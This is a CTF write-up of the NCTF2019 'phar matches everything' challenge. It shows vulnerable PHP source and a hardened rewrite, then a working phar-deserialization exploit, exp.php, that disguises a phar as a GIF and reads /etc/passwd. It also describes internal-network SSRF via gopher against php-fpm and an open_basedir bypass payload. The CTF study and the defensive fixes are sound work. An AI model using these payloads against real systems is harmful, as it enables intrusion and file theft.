
[NCTF2019]phar matches everything

source link: https://yanmymickey.github.io/2020/05/02/CTF_WP/%5BNCTF2019%5Dphar%20matches%20everything/


Posted on 2020-05-02, edited on 2021-01-16. In CTF, PHP, WP



Source

<?php
class Easytest{
    protected $test;
    public function funny_get(){
        return $this->test;
    }
}

class Main {
    public $url;
    public function curl($url){
        // No protocol restriction: file://, gopher://, dict:// are all accepted here
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $output=curl_exec($ch);
        curl_close($ch);
        return $output;
    }
    public function __destruct(){
        // Second deserialization: request input goes straight into unserialize()
        $this_is_a_easy_test=unserialize($_GET['careful']);
        if($this_is_a_easy_test->funny_get() === '1'){
            echo $this->curl($this->url);
        }
    }
}
if(isset($_POST["submit"])) {
    // First sink: getimagesize() honours stream wrappers, so a phar:// path
    // deserializes the archive metadata (a Main object) before the MIME check
    $check = getimagesize($_POST['name']);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
    } else {
        echo "File is not an image.";
    }
}
?>

Two deserializations

The first is triggered through getimagesize($file_path), which performs phar deserialization; the object deserialized there is an instance of Main.

The second is simple: Easytest's test must be '1'.

Then curl is used to read files.
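For contrast, here is an added, hardened rewrite of the two sinks in the challenge source (the getimagesize() call on a user-supplied name and the curl() call on a deserialized URL). This is example code written for this page, not code from the challenge or the writeup; it assumes a hypothetical upload directory UPLOAD_DIR and that the fetch is only ever meant to reach public http/https hosts.

```php
<?php
// Added example (not from the challenge or the writeup): hardened versions of
// the getimagesize() and curl() sinks.  UPLOAD_DIR is a hypothetical path.

const UPLOAD_DIR = '/var/www/uploads';

/**
 * Map a user-supplied name to a real file under UPLOAD_DIR, or return null.
 * getimagesize(), file_exists(), is_file() and friends all honour PHP stream
 * wrappers, so a name like "phar://x.gif" makes them unserialize the archive's
 * metadata.  Refusing any scheme prefix and resolving with realpath() closes that.
 */
function safe_image_path($name)
{
    if (!is_string($name) || strpos($name, "\0") !== false) {
        return null;
    }
    if (preg_match('#^[A-Za-z][A-Za-z0-9+.\-]*://#', $name)) {
        return null; // phar://, file://, data:// ... are never a valid upload name
    }
    $real = realpath(UPLOAD_DIR . '/' . basename($name));
    if ($real === false || strpos($real, UPLOAD_DIR . '/') !== 0) {
        return null;
    }
    return $real;
}

/**
 * Detect a phar archive disguised as an image.  Every phar stub ends with
 * __HALT_COMPILER(); whatever bytes (here "GIF89a") precede it, so scanning
 * the upload for that token at upload time is a cheap rejection rule.
 */
function looks_like_phar($bytes)
{
    return stripos($bytes, '__HALT_COMPILER') !== false;
}

/**
 * Fetch a URL with curl pinned to http/https, no redirects, and the resolved
 * address checked against private/reserved ranges before connecting.
 * CURLOPT_RESOLVE pins curl to the address that was checked, so a DNS rebind
 * between the check and the connect cannot swap in an internal host.
 */
function fetch_http_only($url)
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return false;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($scheme !== 'http' && $scheme !== 'https') {
        return false; // file://, gopher://, dict:// are exactly what the chain needs
    }
    $ip = gethostbyname($parts['host']); // returns the name unchanged on failure
    $flags = FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
        return false; // unresolvable, loopback, link-local or RFC 1918 target
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL             => $url,
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 10,
        CURLOPT_RESOLVE         => ["{$parts['host']}:{$port}:{$ip}"],
    ]);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

// The upload check from the challenge, with both guards in place.
if (isset($_POST['submit'])) {
    $path  = safe_image_path($_POST['name'] ?? '');
    $check = false;
    if ($path !== null && !looks_like_phar((string) file_get_contents($path))) {
        $check = getimagesize($path);
    }
    echo $check !== false ? 'File is an image - ' . $check['mime'] . '.' : 'File is not an image.';
}
```

The remaining weak spot in the challenge, unserialize() on $_GET['careful'] inside __destruct, has no in-place hardening: request input should never reach unserialize() at all, so the fix there is to carry the flag as a plain parameter (or JSON) rather than a serialized object.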

exp.php

<?php

class Easytest {
    protected $test = '1';
}

class Main {
    public $url ='file:///etc/passwd';
}

$a = new Easytest();
echo serialize($a);
// protected properties serialize with NUL bytes around the name,
// so the query-string form has to be URL-encoded
echo urlencode(serialize($a));
$b = new Main();
@unlink("exp.phar");
$phar = new Phar("exp.phar");
$phar->startBuffering();
// GIF header in front of the stub so getimagesize() reports image/gif
$phar->setStub('GIF89a' . "<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($b);   // the Main object that gets deserialized
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
rename('exp.phar', "exp.gif");

First upload exp.gif


Then pass parameters to catchmime.php to trigger the deserialization:

careful is used to trigger the second deserialization

name is used to trigger the phar deserialization


Change the url to read hosts, since this challenge wants us to go after the internal network


I read 173.187.197.10; then I read http://173.187.197.10 over the http protocol and found it was the current page, so I read http://173.187.197.11 next.


php-fpm unauthorized access vulnerability

Use the exp from the linked article.

Then deliver the payload generated by that exp over the gopher protocol.

Run phpinfo(); first; its output shows that open_basedir has to be bypassed.

Adding the open_basedir bypass payload is enough:

<?php mkdir('/tmp/fuck');chdir('/tmp/fuck');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));readfile('/flag');?>

The flag is in the root directory


Reference

[NCTF2019]phar matches everything (phar deserialization)
